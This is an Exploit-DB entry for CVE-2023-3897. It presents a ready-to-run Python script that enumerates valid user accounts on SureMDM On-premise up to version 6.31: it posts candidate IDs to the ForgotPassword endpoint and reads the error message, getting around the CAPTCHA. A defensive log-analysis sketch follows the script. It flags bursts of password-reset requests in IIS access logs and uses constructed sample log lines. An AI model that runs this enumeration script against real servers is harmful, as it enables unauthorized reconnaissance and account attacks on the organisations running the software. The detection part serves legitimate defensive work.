[webapps] SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration
source link: https://www.exploit-db.com/exploits/51804
# Exploit Title: SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration
# Date: 05/12/2023
# Exploit Author: Jonas Benjamin Friedli
# Vendor Homepage: https://www.42gears.com/products/mobile-device-management/
# Version: <= 6.31
# Tested on: 6.31
# CVE : CVE-2023-3897
import requests
import sys


def print_help():
    print("Usage: python script.py [URL] [UserListFile]")
    sys.exit(1)


def main():
    if len(sys.argv) != 3 or sys.argv[1] == '-h':
        print_help()

    url, user_list_file = sys.argv[1], sys.argv[2]

    try:
        with open(user_list_file, 'r') as file:
            users = file.read().splitlines()
    except FileNotFoundError:
        print(f"User list file '{user_list_file}' not found.")
        sys.exit(1)

    valid_users = []
    bypass_dir = "/ForgotPassword.aspx/ForgetPasswordRequest"
    enumerate_txt = "This User ID/Email ID is not registered."

    for index, user in enumerate(users):
        progress = (index + 1) / len(users) * 100
        print(f"Processing {index + 1}/{len(users)} users ({progress:.2f}%)", end="\r")

        data = {"UserId": user}
        response = requests.post(
            f"{url}{bypass_dir}",
            json=data,
            headers={"Content-Type": "application/json; charset=utf-8"}
        )

        if response.status_code == 200:
            response_data = response.json()
            if enumerate_txt not in response_data.get('d', {}).get('message', ''):
                valid_users.append(user)

    print("\nFinished processing users.")
    print(f"Valid Users Found: {len(valid_users)}")
    for user in valid_users:
        print(user)


if __name__ == "__main__":
    main()
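
Server-side, the enumeration performed by the script above appears as a burst of POST requests to the ForgetPasswordRequest path from a single client. The following detection sketch is an added example, not part of the original exploit or of SureMDM; it assumes IIS W3C access logs with the fields shown, and the threshold, window and sample log lines are constructed for illustration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Endpoint path taken from the script above; compared case-insensitively.
ENDPOINT = "/forgotpassword.aspx/forgetpasswordrequest"

# Constructed sample in IIS W3C format (assumed log format).
# Client addresses are from documentation ranges.
_POST = "/ForgotPassword.aspx/ForgetPasswordRequest"
SAMPLE_LOG = (
    "#Fields: date time cs-method cs-uri-stem c-ip sc-status\n"
    + "".join(f"2024-01-15 10:00:{s:02d} POST {_POST} 198.51.100.7 200\n" for s in range(8))
    + "2024-01-15 10:01:00 GET /console/ 203.0.113.20 200\n"
    + f"2024-01-15 10:05:00 POST {_POST} 203.0.113.20 200\n"
    + f"2024-01-15 10:30:00 POST {_POST} 203.0.113.20 200\n"
)

def parse_w3c(text):
    """Yield one dict per request line, using the #Fields directive for column names."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split()
            if len(parts) == len(fields):
                yield dict(zip(fields, parts))

def flag_enumeration(text, max_requests=5, window=timedelta(minutes=1)):
    """Return {client_ip: peak_count} for clients with more than max_requests POSTs to ENDPOINT inside window."""
    recent = defaultdict(deque)   # per-client timestamps still inside the window
    flagged = {}
    for row in parse_w3c(text):
        if row.get("cs-method") != "POST" or row.get("cs-uri-stem", "").lower() != ENDPOINT:
            continue
        ts = datetime.strptime(f"{row['date']} {row['time']}", "%Y-%m-%d %H:%M:%S")
        q = recent[row["c-ip"]]
        q.append(ts)
        while ts - q[0] > window:      # drop requests older than the window
            q.popleft()
        if len(q) > max_requests:
            flagged[row["c-ip"]] = max(flagged.get(row["c-ip"], 0), len(q))
    return flagged

if __name__ == "__main__":
    for ip, peak in flag_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: {peak} password-reset requests within one minute")
```

Access logs in this format do not record the JSON body, so the count is per client address rather than per distinct UserId; tune the threshold to the normal password-reset volume of the deployment.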